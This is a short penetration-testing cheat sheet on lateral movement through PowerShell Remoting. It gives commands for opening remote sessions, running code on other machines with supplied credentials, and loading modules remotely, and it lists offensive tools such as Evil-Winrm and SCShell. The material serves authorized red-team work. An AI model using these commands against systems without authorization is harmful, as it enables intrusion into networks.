Getting Access

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

Lateral Movement

PowerShell Remoting

#Enable Powershell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting

#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName $ComputerName>
Enter-PSSession -ComputerName $ComputerName 
#-OR-
Enter-PSSession -Sessions $SessionName

Remote Code Execution with PS Credentials

$SecPassword = ConvertTo-SecureString '$Password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('$DomainName\$User', $SecPassword)
Invoke-Command -ComputerName $ComputerName -Credential $Cred -ScriptBlock {whoami /all}

Import a PowerShell module and execute its functions remotely

#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName $ComputerName -FilePath $PSModule_FilePath -Session $sess 

#Interact with the session
Enter-PSSession -Session $sess

Executing Remote Stateful commands

#Create a new session
$sess = New-PSSession -ComputerName $ComputerName

#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}

#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}

Useful Tools

  • Powercat netcat written in powershell, and provides tunneling, relay and portforward capabilities.

  • SCShell fileless lateral movement tool that relies on ChangeServiceConfigA to run command

  • Evil-Winrm the ultimate WinRM shell for hacking/pentesting

  • RunasCs Csharp and open version of windows builtin runas.exe

Last updated